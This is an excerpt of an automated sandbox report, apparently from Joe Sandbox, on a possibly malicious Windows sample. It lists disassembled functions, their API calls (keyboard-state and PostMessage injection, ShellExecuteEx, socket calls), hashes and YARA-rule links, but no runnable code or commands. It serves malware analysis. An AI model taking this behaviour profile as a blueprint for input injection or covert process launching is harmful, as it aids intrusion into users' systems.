                                                            • Opcode ID: aa5714c8f740ec28707291eeefdceb3e7b004056aba4ff96bc762d2a41dfef14
                                                            • Instruction ID: 7c5eb4ad7aaf2adc91d104f8d18e986a626e176537e8326807bd429d95cc6c6b
                                                            • Opcode Fuzzy Hash: aa5714c8f740ec28707291eeefdceb3e7b004056aba4ff96bc762d2a41dfef14
                                                            • Instruction Fuzzy Hash: C6115E32348356BED7176A14DC82FAB779CEF15360B20406EF901EA1C1DBB46F4047A9
                                                            Function 003C42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003C4312
                                                            • LoadStringW.USER32(00000000), ref: 003C4319
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003C432F
                                                            • LoadStringW.USER32(00000000), ref: 003C4336
                                                            • _wprintf.LIBCMT ref: 003C435C
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003C437A
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 003C4357
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: 1007d4d48f3720007a41e954458e8c75ab12fabac36463c89126258c695c3138
                                                            • Instruction ID: 24e5db4edace00c3725a56904dff37f19fa25064d66af580412674abf0da658c
                                                            • Opcode Fuzzy Hash: 1007d4d48f3720007a41e954458e8c75ab12fabac36463c89126258c695c3138
                                                            • Instruction Fuzzy Hash: DD0167F690024CBFD762A790DD89FE6777CD708700F0005A5BB45E6051EA745E854B74
                                                            Function 003ED43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 003ED47C
                                                            • GetSystemMetrics.USER32(0000000F), ref: 003ED49C
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003ED6D7
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003ED6F5
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003ED716
                                                            • ShowWindow.USER32(00000003,00000000), ref: 003ED735
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 003ED75A
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 003ED77D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: 851089de008dee099de00ece473294a8ccd360c2129ea44a8efbe83146911f72
                                                            • Instruction ID: 2a413346d35eeca90889360edac915c5b765af03a68fb6909673bd991e1d4dbc
                                                            • Opcode Fuzzy Hash: 851089de008dee099de00ece473294a8ccd360c2129ea44a8efbe83146911f72
                                                            • Instruction Fuzzy Hash: 99B19935600269EFDF26CF6AC9C57AD7BB1BF04701F098269EC489E2D5D770A950CB90
                                                            Function 00362A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 00362ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00362B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 0039C21A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 0039C286
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: b186b17c1d9d8be8e1e03d2218935eecbeaf5ad2261495b216d24398a839db45
                                                            • Instruction ID: 439a4c3cca785eeda220a9d33cb1249339b6ba0ea8c803c755adf084a0679d89
                                                            • Opcode Fuzzy Hash: b186b17c1d9d8be8e1e03d2218935eecbeaf5ad2261495b216d24398a839db45
                                                            • Instruction Fuzzy Hash: 9E41E931A18FC09ACB379B68DC88B7B7B99AB45310F57C91DE0874B9A5CAB19841E710
                                                            Function 003C70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 003C70DD
                                                              • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                              • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003C7114
                                                            • EnterCriticalSection.KERNEL32(?), ref: 003C7130
                                                            • _memmove.LIBCMT ref: 003C717E
                                                            • _memmove.LIBCMT ref: 003C719B
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 003C71AA
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003C71BF
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C71DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: 5fc5edc621e5240383f90102a4719c53365fd0ac658db9222e680255f0cde18f
                                                            • Instruction ID: 48368c320dd152838d2b3c3fdfb8e0eaa79ea8c6882c4d19071ebc4b0e694807
                                                            • Opcode Fuzzy Hash: 5fc5edc621e5240383f90102a4719c53365fd0ac658db9222e680255f0cde18f
                                                            • Instruction Fuzzy Hash: D8316D35900205EFCB51EFA4DC85AABB778EF45310F1581A9E9049F296DB70AE14CB60
                                                            Function 003E61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 003E61EB
                                                            • GetDC.USER32(00000000), ref: 003E61F3
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E61FE
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 003E620A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003E6246
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003E6257
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003E902A,?,?,000000FF,00000000,?,000000FF,?), ref: 003E6291
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003E62B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 8be9614a55d6f17864d0ba245b0022ee90b5aab37154f7b31ae575e6973bb1fb
                                                            • Instruction ID: a330080a731f490062b9f72b6b40304226fa6b7a733746694c9aa5700dca0eb4
                                                            • Opcode Fuzzy Hash: 8be9614a55d6f17864d0ba245b0022ee90b5aab37154f7b31ae575e6973bb1fb
                                                            • Instruction Fuzzy Hash: 0D317C72100260AFEB228F518C8AFEA3BADEF59761F054165FE089E2D1C6B59C41CB60
                                                            Function 003BBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: f69ae3acb0a5b27b103ebd8699b427170c7fe35ee8307913a679e5f27cfc8eba
                                                            • Instruction ID: a071b21bf9563a8b2a43030591ffdebb50e6de9bc22695d8f5ded941bcbde9f1
                                                            • Opcode Fuzzy Hash: f69ae3acb0a5b27b103ebd8699b427170c7fe35ee8307913a679e5f27cfc8eba
                                                            • Instruction Fuzzy Hash: D3214162601609BBE607B7129D42FFBB76D9E1038CB054060FF059AE47EFD4DE1182A1
                                                            Function 003CEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                              • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                            • _wcstok.LIBCMT ref: 003CEC94
                                                            • _wcscpy.LIBCMT ref: 003CED23
                                                            • _memset.LIBCMT ref: 003CED56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: 08e84787e7244698900d44828c88bd65c1c653d88eceec739f62a1701b94fbf1
                                                            • Instruction ID: 6eefa25d1fdd9a268710ceb0a7e89d8e716c0afde9c479b288380d4832490732
                                                            • Opcode Fuzzy Hash: 08e84787e7244698900d44828c88bd65c1c653d88eceec739f62a1701b94fbf1
                                                            • Instruction Fuzzy Hash: ECC16E715083419FC766EF64C885F5AB7E4AF85314F01892DF899DB2A2DB70EC45CB82
                                                            Function 003D6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003D6C00
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003D6C21
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D6C34
                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 003D6CEA
                                                            • inet_ntoa.WSOCK32(?), ref: 003D6CA7
                                                              • Part of subcall function 003BA7E9: _strlen.LIBCMT ref: 003BA7F3
                                                              • Part of subcall function 003BA7E9: _memmove.LIBCMT ref: 003BA815
                                                            • _strlen.LIBCMT ref: 003D6D44
                                                            • _memmove.LIBCMT ref: 003D6DAD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            • Opcode ID: 5fd86bf20ab73266d5bea82fe29d8eb9e03661477465a5b82355717643947216
                                                            • Instruction ID: b77961d5f9c4d556d7f88dceffc8bffc471303d5060eeae6ce9f5c6c1c09b74b
                                                            • Opcode Fuzzy Hash: 5fd86bf20ab73266d5bea82fe29d8eb9e03661477465a5b82355717643947216
                                                            • Instruction Fuzzy Hash: D781A172204300ABC712EB64EC92F6AB7EDAF94714F108A1EF5659F292DB70ED05CB51
                                                            Function 00361424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d94f15b393ff3d816b6dc148c999a323d7ddcb24c7fa3d1af4c225a349371697
                                                            • Instruction ID: 706b90bc3dfb7cb46fc722ce3c0b18fbda64366b3e52eb45b3c86ac55dcbdbf8
                                                            • Opcode Fuzzy Hash: d94f15b393ff3d816b6dc148c999a323d7ddcb24c7fa3d1af4c225a349371697
                                                            • Instruction Fuzzy Hash: 44717D30900109EFCB16CF99CC89ABEBB79FF85310F19C259F915AB255C770AA51CB60
                                                            Function 003EB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(01645CF8), ref: 003EB3EB
                                                            • IsWindowEnabled.USER32(01645CF8), ref: 003EB3F7
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003EB4DB
                                                            • SendMessageW.USER32(01645CF8,000000B0,?,?), ref: 003EB512
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 003EB54F
                                                            • GetWindowLongW.USER32(01645CF8,000000EC), ref: 003EB571
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003EB589
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            • Opcode ID: b5842d38cc0b429648642247fb33e928f9fa8a947b1308bc2880c93514c9009b
                                                            • Instruction ID: bf6cffbe150812b1b1a0c0d27be1e129cff9be9121a846c6c4e329ea8120c855
                                                            • Opcode Fuzzy Hash: b5842d38cc0b429648642247fb33e928f9fa8a947b1308bc2880c93514c9009b
                                                            • Instruction Fuzzy Hash: 9F718B346042A4AFDB239F56C8D1FBBBBA9EF09300F154269E945972E2C771A940CF50
                                                            Function 003DF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003DF448
                                                            • _memset.LIBCMT ref: 003DF511
                                                            • ShellExecuteExW.SHELL32(?), ref: 003DF556
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                              • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                            • GetProcessId.KERNEL32(00000000), ref: 003DF5CD
                                                            • CloseHandle.KERNEL32(00000000), ref: 003DF5FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: dc6aef1fae80cf50aaee6f9bc34cd946dedc0d37071103004896635022b38fa1
                                                            • Instruction ID: bcdc562b8757cc9a55dcf18d39128c73721026ea235b7ff3edbe93303d6358ff
                                                            • Opcode Fuzzy Hash: dc6aef1fae80cf50aaee6f9bc34cd946dedc0d37071103004896635022b38fa1
                                                            • Instruction Fuzzy Hash: DC619075A00619DFCF16EFA4D4819AEBBF5FF49314F14806AE85AAB351CB30AD41CB90
                                                            Function 003C0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 003C0F8C
                                                            • GetKeyboardState.USER32(?), ref: 003C0FA1
                                                            • SetKeyboardState.USER32(?), ref: 003C1002
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 003C1030
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 003C104F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 003C1095
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003C10B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 187a6f7e707e9b19b4a42bec78dabf2ee2638f6df6c2e42e849974d2e736f087
                                                            • Instruction ID: c8625fc1d9ed665f6f0e49ad284bb040297aea92aaffaf250131cadc1a9e4352
                                                            • Opcode Fuzzy Hash: 187a6f7e707e9b19b4a42bec78dabf2ee2638f6df6c2e42e849974d2e736f087
                                                            • Instruction Fuzzy Hash: 7651CFA05046D57DFB3742348C55FBABEA96B07304F09858DE1D4CA8D3C2D9ACD8E751
                                                            Function 003C0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 003C0DA5
                                                            • GetKeyboardState.USER32(?), ref: 003C0DBA
                                                            • SetKeyboardState.USER32(?), ref: 003C0E1B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003C0E47
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003C0E64
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003C0EA8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003C0EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 153ff2766004976dec29a969f68c4d34128b2767c58521d885998223fc31581c
                                                            • Instruction ID: 2f009db5b477ad21b6e93d35450907194b5f3e92229310a909daf833d3e7a168
                                                            • Opcode Fuzzy Hash: 153ff2766004976dec29a969f68c4d34128b2767c58521d885998223fc31581c
                                                            • Instruction Fuzzy Hash: 2A5105A0544BD5BDFB3B83748C55F7ABEA95B06300F08898DE1D5DA8C3C395AC88E760
                                                            Function 003C55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: 181e2463982d6bfe5539de2334fe06f256dce4e15838f9a9234b8a53ff9cf96e
                                                            • Instruction ID: add3ac2ef1f3c15f229b22168e4957a07f960fa1781d0cc4e557a637d3856c08
                                                            • Opcode Fuzzy Hash: 181e2463982d6bfe5539de2334fe06f256dce4e15838f9a9234b8a53ff9cf96e
                                                            • Instruction Fuzzy Hash: 91417375C1171876CB13FBF48C86ACFB3B89F05310F508996E918E7221EB34A695C7A6
                                                            Function 003BD56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003BD5D4
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003BD60A
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003BD61B
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003BD69D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
